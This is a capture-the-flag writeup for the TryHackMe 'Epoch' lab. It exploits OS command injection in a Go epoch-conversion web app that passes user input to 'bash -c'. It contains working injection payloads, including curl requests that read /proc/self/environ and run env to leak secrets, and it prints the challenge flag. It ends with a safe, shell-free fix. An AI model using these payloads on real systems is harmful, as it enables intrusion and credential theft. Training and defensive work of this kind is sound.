Writeup Aria

Epoch


room

Desc

Be honest, you have always wanted an online tool that could help you convert UNIX dates and timestamps! Wait... it doesn't need to be online, you say? Are you telling me there is a command-line Linux program that can already do the same thing? Well, of course, we already knew that! Our website actually just passes your input right along to that command-line program!

Access this challenge by deploying both the vulnerable machine by pressing the green "Start Machine" button located within this task, and the TryHackMe AttackBox by pressing the "Start AttackBox" button located at the top-right of the page.

Navigate to the following URL using the AttackBox: http://MACHINE_IP


solution

There is a page that converts epoch time.


Out of curiosity, I tried adding the ; character to the epoch time input, and it turned out that the id command could be executed.


However, when running a command like

Then I tried ls, and tried to read the file main.go.

123123 ; cat main.go
package main

import (
	"fmt"
	"os/exec"

	"github.com/gofiber/fiber/v2"
	"github.com/gofiber/fiber/v2/middleware/logger"
	"github.com/gofiber/template/html"
)

func main() {
	// Initialize standard Go html template engine
	engine := html.New("./views", ".html")

	app := fiber.New(fiber.Config{
		Views: engine,
	})
	app.Use(logger.New())

	app.Get("/", func(c *fiber.Ctx) error {
		type Request struct {
			Epoch string `query:"epoch"`
		}
		r := new(Request)

		if err := c.QueryParser(r); err != nil {
			return c.SendStatus(fiber.StatusBadRequest)
		}

		if r.Epoch == "" {
			return c.Render("index", fiber.Map{
				"epoch":  r.Epoch,
				"output": "",
			})
		}

		cmdString := fmt.Sprintf("date -d @%s", r.Epoch)

		cmd := exec.Command("bash", "-c", cmdString)
		fmt.Printf("Running: %s", cmd)
		stdoutStderr, err := cmd.CombinedOutput()
		fmt.Printf("Result: %s", stdoutStderr)
		if err != nil {
			return c.Render("index", fiber.Map{
				"epoch":  r.Epoch,
				"output": err,
			})
		}
		return c.Render("index", fiber.Map{
			"epoch":  r.Epoch,
			"output": string(stdoutStderr),
		})
	})

	err := app.Listen(":3000")
	if err != nil {
		panic(err)
	}
}

; cat views/index.html

<!DOCTYPE html>

<head>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <style>
        body,
        html {
            height: 100%;
        }
    </style>
</head>

<body>
    <div class="container h-100">
        <div class="row mt-5">
            <div class="col-12 mb-4">
                <h3 class="text-center">Epoch to UTC convertor ⏳</h3>
            </div>
            <form class="col-6 mx-auto" action="/">
                <div class=" input-group">
                    <input name="epoch" value="{{.epoch}}" type="text" class="form-control" placeholder="Epoch"
                        aria-label="Epoch" aria-describedby="basic-addon2" required>
                    <div class="input-group-append">
                        <button class="btn btn-outline-secondary" type="submit">Convert</button>
                    </div>
                </div>
            </form>
            <div class="col-9 mt-4 mx-auto">
                <pre>{{.output}}</pre>
            </div>
        </div>
    </div>
</body>

</html>

After analysis, it turns out that this application is written in the Go programming language and runs the command date -d @<input_epoch_time>. Here we can exploit command injection by appending the ; character followed by the command we want to run. Now we need to find the file that contains the flag.

Here I switched to curl to make things easier.

curl http://10.80.186.110/?epoch=%3B+id

Then I looked for the flag everywhere but did not find it, and it occurred to me that it might be in the file /proc/self/environ, or by using the env command.

curl "http://10.80.186.110/?epoch=%3B+cat /proc/self/environ"
# HOSTNAME=e7c1352e71ec\ufffdPWD=/home/challenge\ufffdHOME=/home/challenge\ufffdGOLANG_VERSION=1.15.7\ufffdFLAG=flag{7da6c7debd40bd611560c13d8149b647}\ufffdSHLVL=1\ufffdPATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\ufffd_=/usr/bin/cat\ufffd</pre>

# env can also be used
curl "http://10.80.186.110/?epoch=%3B+env"
# HOSTNAME=e7c1352e71ec
# PWD=/home/challenge
# HOME=/home/challenge
# GOLANG_VERSION=1.15.7
# FLAG=flag{7da6c7debd40bd611560c13d8149b647}
# SHLVL=1
# PATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# _=/usr/bin/env


flag

flag{7da6c7debd40bd611560c13d8149b647}
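
The root cause in main.go is that the epoch query value is formatted into a string and handed to bash -c. The following is an added example, not part of the challenge source or the original writeup, of how the conversion can be done without a shell. The function names and the accepted range (years 0001 to 9999) are assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"strconv"
	"strings"
	"time"
)

// Accepted range is an assumption of this example: years 0001 to 9999, UTC.
const (
	minEpoch = -62135596800
	maxEpoch = 253402300799
)

var errBadEpoch = errors.New("epoch must be a base-10 integer")

// parseEpoch accepts only a signed decimal integer, so input containing
// anything else (including ';') is rejected before it is used.
func parseEpoch(input string) (int64, error) {
	n, err := strconv.ParseInt(strings.TrimSpace(input), 10, 64)
	if err != nil || n < minEpoch || n > maxEpoch {
		return 0, errBadEpoch
	}
	return n, nil
}

// convertEpoch replaces the external date call with the standard library.
func convertEpoch(input string) (string, error) {
	n, err := parseEpoch(input)
	if err != nil {
		return "", err
	}
	return time.Unix(n, 0).UTC().Format(time.UnixDate), nil
}

// dateCommand keeps the external program but passes one argv element, no shell.
func dateCommand(n int64) *exec.Cmd {
	return exec.Command("date", "-u", "-d", "@"+strconv.FormatInt(n, 10))
}

func main() {
	// Constructed inputs: a valid value and the input shape from the writeup.
	for _, in := range []string{"123123", "123123 ; cat main.go"} {
		out, err := convertEpoch(in)
		fmt.Printf("%q -> %q, err=%v\n", in, out, err)
	}
}
```

In the handler, the result of convertEpoch would take the place of the CombinedOutput value, and a validation error would map to fiber.StatusBadRequest.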
